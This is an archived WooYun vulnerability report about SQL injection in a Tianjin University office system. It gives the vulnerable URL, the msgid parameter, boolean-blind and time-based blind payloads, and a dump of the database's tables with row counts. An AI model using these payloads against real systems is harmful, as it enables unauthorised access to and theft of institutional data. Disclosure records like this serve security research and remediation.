当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0130582

漏洞标题:天津大学办公网某处存在SQL注入漏洞泄漏大量数据信息

相关厂商:tju.edu.cn

漏洞作者: 路人甲

提交时间:2015-07-31 08:00

修复时间:2015-08-05 08:02

公开时间:2015-08-05 08:02

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-07-31: 细节已通知厂商并且等待厂商处理中
2015-08-05: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

RT

详细说明:

漏洞地址:

http://e.tju.edu.cn/OA/tmsgReadLog.do?msgid=697269


---
Parameter: msgid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: msgid=697269 AND 3669=3669
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: msgid=697269 AND (SELECT * FROM (SELECT(SLEEP(5)))NpWH)
---

漏洞证明:

1.png


Database: app_manager
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| eweb_sys_log_visit                    | 21854313 |
| oa_message_readlog_bak                | 3374138 |
| oa_message_oplog                      | 1327788 |
| oa_message_readlog                    | 845441  |
| oa_message_receiver_bak               | 637957  |
| oa_message_bak                        | 482546  |
| oa_message_atta_bak                   | 472307  |
| oa_message_receiver                   | 212001  |
| oa_message_atta                       | 137866  |
| oa_message                            | 134623  |
| eweb_info_oplog                       | 53026   |
| eweb_info                             | 30924   |
| oa_workflow_user_task                 | 21613   |
| oa_workflow_log                       | 16591   |
| eweb_info_atta                        | 13852   |
| eweb_info_cnt                         | 12430   |
| oa_workflow_doc_form_approval         | 8325    |
| oa_schfile_oplog                      | 4333    |
| oa_schfile_atta                       | 2864    |
| oa_schfile                            | 2848    |
| oa_workflow_doc_form_atta             | 2121    |
| oa_workflow_doc_form                  | 2002    |
| eweb_sys_group_member                 | 1681    |
| oa_workflow_user_role                 | 1298    |
| oa_message_info                       | 774     |
| eweb_oa_task                          | 448     |
| oa_workflow_role                      | 407     |
| oa_message_info_atta                  | 329     |
| oa_workflow_doc_form_comment          | 269     |
| eweb_info_privilege                   | 249     |
| eweb_oa_task_atta                     | 233     |
| eweb_info_dict_class                  | 170     |
| USERS                                 | 92      |
| eweb_info_dict_system                 | 58      |
| GROUPS                                | 58      |
| COLLEGE                               | 57      |
| oa_dict_schfile_keycate               | 46      |
| oa_workflow_status                    | 38      |
| oa_workflow_doc_form_favor            | 26      |
| eweb_info_link                        | 22      |
| pbcatedt                              | 21      |
| pbcatfmt                              | 20      |
| oa_workflow_leave_type                | 13      |
| eweb_info_dict_category               | 12      |
| oa_dict_schfile_category              | 12      |
| oa_dict_schfile_sendorg               | 9       |
| oa_dict_class                         | 8       |
| oa_dict_schfile_audiences             | 6       |
| oa_workflow                           | 6       |
| test                                  | 5       |
| test1                                 | 5       |
| application_seal                      | 4       |
| exercise                              | 4       |
| eweb_sys_user                         | 2       |
| oa_workflow_receive_file_type         | 2       |
| oa_workflow_report_file_seq           | 2       |
| counter                               | 1       |
| eweb_sys_group                        | 1       |
| seal_atta                             | 1       |
| test_inno                             | 1       |
+---------------------------------------+---------+
Database: information_schema
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| COLUMNS                               | 914     |
| GLOBAL_STATUS                         | 291     |
| SESSION_STATUS                        | 291     |
| GLOBAL_VARIABLES                      | 271     |
| SESSION_VARIABLES                     | 271     |
| STATISTICS                            | 138     |
| COLLATION_CHARACTER_SET_APPLICABILITY | 128     |
| COLLATIONS                            | 127     |
| PARTITIONS                            | 97      |
| TABLES                                | 97      |
| KEY_COLUMN_USAGE                      | 92      |
| TABLE_CONSTRAINTS                     | 72      |
| CHARACTER_SETS                        | 36      |
| PROCESSLIST                           | 14      |
| PLUGINS                               | 10      |
| ENGINES                               | 8       |
| SCHEMA_PRIVILEGES                     | 4       |
| SCHEMATA                              | 2       |
| TABLE_PRIVILEGES                      | 1       |
| USER_PRIVILEGES                       | 1       |
+---------------------------------------+---------+

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-08-05 08:02

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无